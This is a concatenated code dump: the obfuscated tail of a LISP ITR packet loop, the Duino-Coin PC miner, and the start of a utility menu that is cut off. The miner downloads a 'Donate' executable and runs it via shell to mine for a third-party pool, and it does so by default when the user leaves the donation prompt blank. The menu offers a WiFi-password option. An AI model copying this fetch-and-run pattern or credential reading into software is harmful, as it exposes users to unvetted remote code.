if ( lisp . lisp_ipc_data_plane and Oo0oO0oo0oO00 in IIi11 ) :
lisp . lisp_process_punt ( Oo0oO0oo0oO00 , II1iII1i ,
iiI1iIiI )
if 85 - 85: iIii1I11I1II1 . II111iiii
if 54 - 54: Ii1I . OoooooooOO % Oo0Ooo
if 22 - 22: OOooOOo
if 22 - 22: iII111i * I11i - Oo0Ooo * O0 / i11iIiiIii
if 78 - 78: Oo0Ooo * O0 / ooOoO0o + OoooooooOO + OOooOOo
if ( i111I in IIi11 ) :
I1oo , o0OO0 , oOo00Oo0o0Oo , ooo0OoO = lisp . lisp_receive ( O0OO0o0O00oO [ 0 ] ,
False )
if ( o0OO0 == "" ) : break
if 23 - 23: iII111i % OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
if ( lisp . lisp_is_rloc_probe_reply ( ooo0OoO [ 0 : 1 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe reply, using pcap" )
continue
if 94 - 94: i1IIi
lisp . lisp_parse_packet ( O0OO0o0O00oO , ooo0OoO , o0OO0 , oOo00Oo0o0Oo )
if 36 - 36: I1IiiI + Oo0Ooo
if 46 - 46: iII111i
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
if ( II1Ii1iI1i in IIi11 ) :
I1oo , o0OO0 , oOo00Oo0o0Oo , ooo0OoO = lisp . lisp_receive ( o00O [ 0 ] ,
False )
if ( o0OO0 == "" ) : break
if 65 - 65: ooOoO0o - i1IIi
if ( lisp . lisp_is_rloc_probe_reply ( ooo0OoO [ 0 : 1 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe reply, using pcap" )
continue
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
OooO0O0Ooo = lisp . lisp_parse_packet ( o00O , ooo0OoO , o0OO0 , oOo00Oo0o0Oo )
if 85 - 85: o0oOOo0O0Ooo / I1Ii111
if 67 - 67: I11i % oO0o
if 39 - 39: i11iIiiIii + IiII
if 7 - 7: iIii1I11I1II1 - i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
if ( OooO0O0Ooo ) :
OOOOO0o0OOo = [ i111I , i111I ]
lisp . lisp_start_rloc_probe_timer ( 0 , OOOOO0o0OOo )
if 25 - 25: II111iiii / OoO0O00
if 64 - 64: O0 % ooOoO0o
if 40 - 40: o0oOOo0O0Ooo + I11i
if 77 - 77: i11iIiiIii % IiII + I1Ii111 % OoooooooOO - I11i
if 26 - 26: Oo0Ooo + O0 - iIii1I11I1II1
if 47 - 47: OoooooooOO
if 2 - 2: OoOoOO00 % I1Ii111 * Oo0Ooo * OoOoOO00
if ( oO0oIIII in IIi11 ) :
I1oo , o0OO0 , oOo00Oo0o0Oo , ooo0OoO = lisp . lisp_receive ( oO0oIIII , True )
if 65 - 65: i11iIiiIii + Oo0Ooo * OoooooooOO - OoO0O00
if ( o0OO0 == "" ) : break
if 26 - 26: o0oOOo0O0Ooo % OOooOOo + OOooOOo % I11i * i11iIiiIii / iII111i
if ( I1oo == "command" ) :
ooo0OoO = ooo0OoO . decode ( )
if ( ooo0OoO == "clear" ) :
lisp . lisp_clear_map_cache ( )
continue
if 64 - 64: oO0o % OoOoOO00 / II111iiii % ooOoO0o - iII111i
if ( ooo0OoO . find ( "nonce%" ) != - 1 ) :
I1i1II1 ( ooo0OoO )
continue
if 2 - 2: I1Ii111 - I1ii11iIi11i + o0oOOo0O0Ooo * OoO0O00 / iII111i
lispconfig . lisp_process_command ( oO0oIIII , I1oo ,
ooo0OoO , "lisp-itr" , [ o00000oo00 ] )
elif ( I1oo == "api" ) :
ooo0OoO = ooo0OoO . decode ( )
lisp . lisp_process_api ( "lisp-itr" , oO0oIIII , ooo0OoO )
elif ( I1oo == "data-packet" ) :
ii1iii1I1I ( ooo0OoO , "ipc" )
else :
if ( lisp . lisp_is_rloc_probe_reply ( ooo0OoO [ 0 : 1 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe request, using pcap" )
continue
if 26 - 26: OOooOOo * Oo0Ooo
lisp . lisp_parse_packet ( II1iII1i , ooo0OoO , o0OO0 , oOo00Oo0o0Oo )
if 31 - 31: I11i * oO0o . Ii1I
if 35 - 35: I11i
if 94 - 94: ooOoO0o / i11iIiiIii % O0
if 70 - 70: I11i - Oo0Ooo / OoooooooOO % OoooooooOO
if 95 - 95: OoooooooOO % OoooooooOO . Ii1I
i1i1i1I ( )
lisp . lisp_print_banner ( "ITR normal exit" )
exit ( 0 )
if 26 - 26: oO0o + IiII - II111iiii . II111iiii + I1ii11iIi11i + OoOoOO00
if 68 - 68: O0
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
PC_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official PC Miner 2.73 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2021
"""
from time import time, sleep, strptime, ctime
from hashlib import sha1
from socket import socket
from multiprocessing import Lock as thread_lock
from multiprocessing import cpu_count, current_process
from multiprocessing import Process, Manager
from threading import Thread
from datetime import datetime
from random import randint
from os import execl, mkdir, _exit
from subprocess import DEVNULL, Popen, check_call
import pip
import sys
import os
import json
import requests
from pathlib import Path
from re import sub
from random import choice
from platform import machine as osprocessor
from signal import SIGINT, signal
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from configparser import ConfigParser
configparser = ConfigParser()
def handler(signal_received, frame):
"""
Nicely handle CTRL+C exit
"""
if current_process().name == "MainProcess":
pretty_print(
get_string("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ get_string("goodbye"),
"warning")
_exit(0)
def install(package):
"""
Automatically installs python pip package and restarts the program
"""
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
try:
from xxhash import xxh64
xxhash_en = True
except ModuleNotFoundError:
print("Xxhash is not installed - this mining algorithm will be disabled")
xxhash_en = False
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
import cpuinfo
except ModuleNotFoundError:
print("Cpuinfo is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install py-cpuinfo")
install("py-cpuinfo")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
class Settings:
"""
Class containing default miner and server settings
"""
ENCODING = "UTF8"
SEPARATOR = ","
VER = 2.73
DATA_DIR = "Duino-Coin PC Miner " + str(VER)
TRANSLATIONS = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
TRANSLATIONS_FILE = "/Translations.json"
SETTINGS_FILE = "/Settings.cfg"
SOC_TIMEOUT = 15
REPORT_TIME = 50
DONATE_LVL = 0
BLOCK = " ‖ "
PICK = ""
COG = " @"
if os.name != "nt" or bool(os.name == "nt" and os.environ.get("WT_SESSION")):
# Windows' cmd does not support emojis, shame!
PICK = " ⛏"
COG = " ⚙"
class Algorithms:
"""
Class containing algorithms used by the miner
For more info about the implementation refer to the Duino whitepaper:
https://github.com/revoxhere/duino-coin/blob/gh-pages/assets/whitepaper.pdf
"""
def DUCOS1(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
base_hash = sha1(last_h.encode('ascii'))
for nonce in range(100 * diff + 1):
temp_h = base_hash.copy()
temp_h.update(str(nonce).encode('ascii'))
d_res = temp_h.hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
def XXHASH(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
for nonce in range(100 * diff + 1):
d_res = xxh64(last_h + str(nonce),
seed=2811).hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
global s
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
s.connect((pool))
def send(msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool():
"""
Fetches best pool from the /getPool API endpoint
"""
while True:
pretty_print(" " + get_string("connection_search"),
"warning", "net0")
try:
response = requests.get(
"https://server.duinocoin.com/getPool").json()
if response["success"] == True:
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}"
+ ", retrying in 15s", "warning", "net0")
sleep(10)
else:
raise Exception(
"no response - IP ban or connection error")
except Exception as e:
pretty_print(f"Error fetching mining node: {e}"
+ ", retrying in 15s", "error", "net0")
sleep(15)
class Donate:
def load(donation_level):
if donation_level > 0:
if os.name == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
elif os.name == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
else:
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
def start(donation_level):
if os.name == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & Donate.exe '
+ '-o stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*10}')
elif os.name == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate -o '
+ 'stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*10}')
if donation_level <= 0:
pretty_print(
Fore.YELLOW + get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning', 'sys0')
sleep(5)
if donation_level > 0:
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print(get_string('thanks_donation').replace("\n", "\n\t\t"),
'error', 'sys0')
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
val = str(round((val / 1_000))) + " k"
else:
val = str(round(val)) + " "
return val + symbol
def periodic_report(start_time, end_time,
shares, hashrate, uptime):
"""
Displays nicely formated uptime stats
"""
seconds = round(end_time - start_time)
pretty_print(get_string("periodic_mining_report")
+ Fore.RESET + Style.NORMAL
+ get_string("report_period")
+ str(seconds) + get_string("report_time")
+ get_string("report_body1")
+ str(shares) + get_string("report_body2")
+ str(round(shares/seconds, 1))
+ get_string("report_body3")
+ get_string("report_body4")
+ str(get_prefix("H/s", hashrate, 2))
+ get_string("report_body5")
+ str(int(hashrate*seconds))
+ get_string("report_body6")
+ get_string("total_mining_time")
+ str(uptime), "success")
def calculate_uptime(start_time):
"""
Returns seconds, minutes or hours passed since timestamp
"""
uptime = time() - start_time
if uptime <= 59:
return str(round(uptime)) + get_string("uptime_seconds")
elif uptime == 60:
return str(round(uptime // 60)) + get_string("uptime_minute")
elif uptime >= 60:
return str(round(uptime // 60)) + get_string("uptime_minutes")
elif uptime == 3600:
return str(round(uptime // 3600)) + get_string("uptime_hour")
elif uptime >= 3600:
return str(round(uptime // 3600)) + get_string("uptime_hours")
def pretty_print(msg: str = None,
state: str = "success",
sender: str = "sys0"):
"""
Produces nicely formatted CLI output for messages:
HH:MM:S |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("cpu"):
bg_color = Back.YELLOW
elif sender.startswith("sys"):
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT + bg_color + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type,
accept, reject,
hashrate, total_hashrate,
computetime, diff, ping,
back_color):
"""
Produces nicely formatted CLI output for shares:
HH:MM:S |cpuN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
total_hashrate = get_prefix("H/s", total_hashrate, 2)
diff = get_prefix("", int(diff), 0)
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + back_color + Fore.RESET
+ " cpu" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.YELLOW
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " ∙ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} ∙ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def get_string(string_name):
"""
Gets a string from the language file
"""
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
class Miner:
def greeting():
diff_str = get_string("net_diff_short")
if user_settings["start_diff"] == "LOW":
diff_str = get_string("low_diff_short")
elif user_settings["start_diff"] == "MEDIUM":
diff_str = get_string("medium_diff_short")
current_hour = strptime(ctime(time())).tm_hour
greeting = get_string("greeting_back")
if current_hour < 12:
greeting = get_string("greeting_morning")
elif current_hour == 12:
greeting = get_string("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = get_string("greeting_afternoon")
elif current_hour >= 18:
greeting = get_string("greeting_evening")
print("\n" + Style.DIM + Fore.YELLOW + Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string("banner") + Style.RESET_ALL
+ Fore.MAGENTA + " (" + str(Settings.VER) + ") "
+ Fore.RESET + "2019-2021")
print(Style.DIM + Fore.YELLOW + Settings.BLOCK + Style.NORMAL
+ Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + lang.capitalize()
+ " translation: " + Fore.YELLOW
+ get_string("translation_autor"))
try:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x " + str(cpu["brand_raw"]))
except:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x threads")
if os.name == "nt" or os.name == "posix":
print(Style.DIM + Fore.YELLOW
+ Settings.BLOCK + Style.NORMAL + Fore.RESET
+ get_string("donation_level") + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["donate"]))
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("algorithm")
+ Style.BRIGHT + Fore.YELLOW + user_settings["algorithm"]
+ Settings.COG + " " + diff_str)
if user_settings["identifier"] != "None":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("rig_identifier")
+ Style.BRIGHT + Fore.YELLOW + user_settings["identifier"])
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + str(greeting)
+ ", " + Style.BRIGHT + Fore.YELLOW
+ str(user_settings["username"]) + "!\n")
def preload():
"""
Creates needed directories and files for the miner
"""
global lang_file
global lang
if not Path(Settings.DATA_DIR).is_dir():
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE).is_file():
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE,
"wb") as f:
f.write(requests.get(Settings.TRANSLATIONS).content)
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE, "r",
encoding=Settings.ENCODING) as file:
lang_file = json.load(file)
try:
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("th"):
lang = "thai"
else:
lang = "english"
else:
try:
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
lang = configparser["PC Miner"]["language"]
except Exception:
lang = "english"
except Exception as e:
print("Error with lang file, falling back to english: " + str(e))
lang = "english"
def load_cfg():
"""
Loads miner settings file or starts the config tool
"""
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
print(get_string("basic_config_tool")
+ Settings.DATA_DIR
+ get_string("edit_config_file_warning")
+ "\n"
+ get_string("dont_have_account")
+ Fore.YELLOW
+ get_string("wallet")
+ Fore.RESET
+ get_string("register_warning"))
username = input(get_string("ask_username") + Style.BRIGHT)
if not username:
username = choice(["revox", "Bilaboz", "JoyBed", "Connor2"])
algorithm = "DUCO-S1"
if xxhash_en:
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - DUCO-S1 ("
+ get_string("recommended")
+ ")\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - XXHASH")
prompt = sub(r"\D", "",
input(get_string("ask_algorithm")
+ Style.BRIGHT))
if prompt == "2":
algorithm = "XXHASH"
intensity = 100 # None
##
# intensity = sub(r"\D", "",
# input(Style.NORMAL
## + get_string("ask_intensity")
# + Style.BRIGHT))
# if not intensity:
## intensity = 95
# elif float(intensity) > 100:
## intensity = 100
# elif float(intensity) < 1:
## intensity = 1
threads = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_threads")
+ str(cpu_count()) + "): " + Style.BRIGHT))
if not threads:
threads = cpu_count()
if int(threads) > 8:
threads = 8
pretty_print(
Style.BRIGHT
+ get_string("max_threads_notice"))
elif int(threads) < 1:
threads = 1
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - " + get_string("low_diff")
+ "\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - " + get_string("medium_diff")
+ "\n" + Style.BRIGHT
+ "3" + Style.NORMAL + " - " + get_string("net_diff"))
start_diff = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_difficulty")
+ Style.BRIGHT))
if start_diff == "1":
start_diff = "LOW"
elif start_diff == "3":
start_diff = "NET"
else:
start_diff = "MEDIUM"
rig_id = input(Style.NORMAL + get_string("ask_rig_identifier")
+ Style.BRIGHT)
if rig_id.lower() == "y":
rig_id = str(input(Style.NORMAL + get_string("ask_rig_name")
+ Style.BRIGHT))
else:
rig_id = "None"
donation_level = '0'
if os.name == 'nt' or os.name == 'posix':
donation_level = input(Style.NORMAL
+ get_string('ask_donation_level')
+ Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
configparser["PC Miner"] = {
"username": username,
"intensity": intensity,
"threads": threads,
"start_diff": start_diff,
"donate": int(donation_level),
"identifier": rig_id,
"algorithm": algorithm,
"language": lang,
"soc_timeout": Settings.SOC_TIMEOUT,
"report_sec": Settings.REPORT_TIME,
"discord_rp": "y"}
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
return configparser["PC Miner"]
def m_connect(id, pool):
retry_count = 0
while True:
try:
if retry_count > 3:
pool = Client.fetch_pool()
retry_count = 0
socket_connection = Client.connect(pool)
POOL_VER = Client.recv(5)
if id == 0:
Client.send("MOTD")
motd = Client.recv(512).replace("\n", "\n\t\t")
pretty_print("MOTD: " + Fore.RESET + Style.NORMAL
+ str(motd), "success", "net" + str(id))
if float(POOL_VER) <= Settings.VER:
pretty_print(get_string("connected") + Fore.RESET
+ Style.NORMAL +
get_string("connected_server")
+ str(POOL_VER) + ", " + pool[0] + ":"
+ str(pool[1]) + ")", "success",
"net" + str(id))
else:
pretty_print(get_string("outdated_miner")
+ str(Settings.VER) + ") -"
+ get_string("server_is_on_version")
+ str(POOL_VER) + Style.NORMAL
+ Fore.RESET +
get_string("update_warning"),
"warning", "net" + str(id))
sleep(5)
break
except:
pretty_print(get_string('connecting_error')
+ Style.NORMAL + f' (connection err: {e})',
'error', 'net0')
retry_counter += 1
sleep(10)
def mine(id: int, user_settings: list,
pool: tuple,
accept: int, reject: int,
hashrate: list,
single_miner_id: str):
"""
Main section that executes the functionalities from the sections above.
"""
using_algo = get_string("using_algo")
if user_settings["algorithm"] == "XXHASH":
using_algo = get_string("using_algo_xxh")
pretty_print(get_string("mining_thread") + str(id)
+ get_string("mining_thread_starting")
+ Style.NORMAL + Fore.RESET + using_algo + Fore.YELLOW
+ str(user_settings["intensity"])
+ "% " + get_string("efficiency"),
"success", "sys"+str(id))
last_report = time()
r_shares, last_shares = 0, 0
while True:
try:
Miner.m_connect(id, pool)
while True:
try:
while True:
job_req = "JOB"
if user_settings["algorithm"] == "XXHASH":
job_req = "JOBXX"
Client.send(job_req
+ Settings.SEPARATOR
+ str(user_settings["username"])
+ Settings.SEPARATOR
+ str(user_settings["start_diff"]))
job = Client.recv().split(Settings.SEPARATOR)
if len(job) == 3:
break
else:
pretty_print(
"Node message: " + str(job[1]),
"warning")
sleep(3)
while True:
time_start = time()
if user_settings["algorithm"] == "XXHASH":
back_color = Back.CYAN
result = Algorithms.XXHASH(
job[0], job[1], int(job[2]),
user_settings["intensity"])
else:
back_color = Back.YELLOW
result = Algorithms.DUCOS1(
job[0], job[1], int(job[2]),
user_settings["intensity"])
computetime = time() - time_start
hashrate[id] = result[1]
total_hashrate = sum(hashrate.values())
while True:
Client.send(f"{result[0]}"
+ Settings.SEPARATOR
+ f"{result[1]}"
+ Settings.SEPARATOR
+ "Official PC Miner"
+ f" {Settings.VER}"
+ Settings.SEPARATOR
+ f"{user_settings['identifier']}"
+ Settings.SEPARATOR
+ Settings.SEPARATOR
+ f"{single_miner_id}")
time_start = time()
feedback = Client.recv(
).split(Settings.SEPARATOR)
ping = (time() - time_start) * 1000
if feedback[0] == "GOOD":
accept.value += 1
share_print(id, "accept",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BLOCK":
reject.value += 1
share_print(id, "block",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BAD":
reject.value += 1
share_print(id, "reject",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
if id == 0:
end_time = time()
elapsed_time = end_time - last_report
if elapsed_time >= Settings.REPORT_TIME:
r_shares = accept.value - last_shares
uptime = calculate_uptime(
mining_start_time)
periodic_report(last_report, end_time,
r_shares,
sum(hashrate.values()),
uptime)
last_report = time()
last_shares = accept.value
break
break
except Exception as e:
pretty_print(get_string("error_while_mining")
+ " " + str(e), "error", "net" + str(id))
sleep(5)
break
except Exception as e:
pass
class Discord_rp:
def connect():
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
Thread(target=Discord_rp.update).start()
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update():
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate.values()), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(accept.value) + "/"
+ str(reject.value + accept.value)
+ " accepted shares",
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
#print("Error updating Discord RPC thread: " + str(e))
pass
sleep(15)
Miner.preload()
p_list = []
mining_start_time = time()
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
cpu = cpuinfo.get_cpu_info()
accept = Manager().Value("i", 0)
reject = Manager().Value("i", 0)
hashrate = Manager().dict()
signal(SIGINT, handler)
user_settings = Miner.load_cfg()
Miner.greeting()
fastest_pool = Client.fetch_pool()
Donate.load(int(user_settings["donate"]))
Donate.start(int(user_settings["donate"]))
"""
Generate a random number that's used only to
make the wallets display one miner with many threads
instead of many separate miners clogging it up
(like it was before release 2.7.3)
"""
single_miner_id = randint(0, 2811)
threads = int(user_settings["threads"])
if threads > 8:
threads = 8
pretty_print(Style.BRIGHT
+ get_string("max_threads_notice"))
for i in range(threads):
p = Process(target=Miner.mine,
args=[i, user_settings,
fastest_pool, accept, reject,
hashrate, single_miner_id])
p_list.append(p)
p.start()
sleep(0.05)
Discord_rp.connect()
for p in p_list:
p.join()
|
combine.py
|
import pyshorteners,pyjokes,pyttsx3,os,threading,socket,subprocess,pygame,time,sys
from googletrans import *
from gtts import gTTS
from covid import Covid
from threading import Thread
from playsound import playsound
def playAudiobackground ():
playsound('s1.mp3')
def main():
while True:
print("\n\t\t\t\t*****WELCOME*******")
print("\t\t\t| Press 1 For URL Shortner")
print("\t\t\t| Press 2 For Jokes Generator")
print("\t\t\t| Press 3 For Translator English to hindi ")
print("\t\t\t| Press 4 Get Covid Updated Information For India")
print("\t\t\t| Press 5 to ComputerName and It's IP Address")
print("\t\t\t| Press 6 to Get WiFi Passwords")
print("\t\t\t| Press 7 to Encrypt Message Into Mores Code")
print("\t\t\t| Press 8 to Exit")
print()
try:
choice=int(input())
if(choice==1):
url = input("Enter your url")
s = pyshorteners.Shortener().tinyurl.short(url)
print("Your shorted is -->", s)
pass
elif choice==2:
joke=pyjokes.get_joke()
print(joke)
engine=pyttsx3.init()
""" RATE"""
rate = engine.getProperty('rate') # getting details of current speaking rate
engine.setProperty('rate', 200) # setting up new voice rate
"""VOLUME"""
volume = engine.getProperty('volume') #getting to know current volume level (min=0 and max=1)
engine.setProperty('volume',1.0) # setting up volume level between 0 and 1
"""VOICE"""
voices = engine.getProperty('voices') #getting details of current voice
#engine.setProperty('voice', voices[0].id) #changing index, changes voices. o for male
engine.setProperty('voice', voices[0].id) #changing index, changes voices. 1 for female
print("Narrating the joke ")
engine.say(joke)
engine.runAndWait()
pass
elif choice==3:
#text = '''The computer was born to solve problems that did not exist before'''
print("Langauges : ")
print(''''af'--'Afrikaans', 'sq'--'Albanian','ar'--'Arabic','hy'--'Armenian',
'bn'--'Bengali','ca'--'Catalan','zh'--'Chinese','zh-cn'--'Chinese (Mandarin/China)',
'zh-tw'--'Chinese (Mandarin/Taiwan)','zh-yue'--'Chinese (Cantonese)','hr'--'Croatian',
'cs'--'Czech','da'--'Danish','nl'--'Dutch','en'--'English','en-au'--'English (Australia)',
'en-uk'--'English (United Kingdom)','en-us'--'English (United States)','fi'--'Finnish',
'fr'--'French','de'--'German','el'--'Greek','hi'--'Hindi','hu'--'Hungarian','is'--'Icelandic',
'id'--'Indonesian','it'--'Italian','ja'--'Japanese','ko'--'Korean','la'--'Latin','lv'--'Latvian',
'mk'--'Macedonian','no'--'Norwegian','pl'--'Polish','pt'--'Portuguese',
'pt-br'--'Portuguese (Brazil)','ro'--'Romanian','ru'--'Russian','sr'--'Serbian',
'sk'--'Slovak','es'--'Spanish','es-es'--'Spanish (Spain)','es-us'--'Spanish (United States)',
'sw'--'Swahili','sv'--'Swedish','ta'--'Tamil','th'--'Thai',
'tr'--'Turkish','vi'--'Vietnamese','cy'--'Welsh''')
lang=input("Enter the langauge You want to convert into ")
text=input("Enter Word/phrase")
translator = Translator()
temp= translator.detect(text)
print('-----------------------------------------------------------------------')
print('The Text is :')
print(text,"\n")
translated = translator.translate(text,dest=lang) #Change en into any langauge you want from below list
# 'af':'Afrikaans', 'sq':'Albanian','ar':'Arabic','hy':'Armenian','bn':'Bengali','ca':'Catalan','zh':'Chinese','zh-cn':'Chinese (Mandarin/China)',
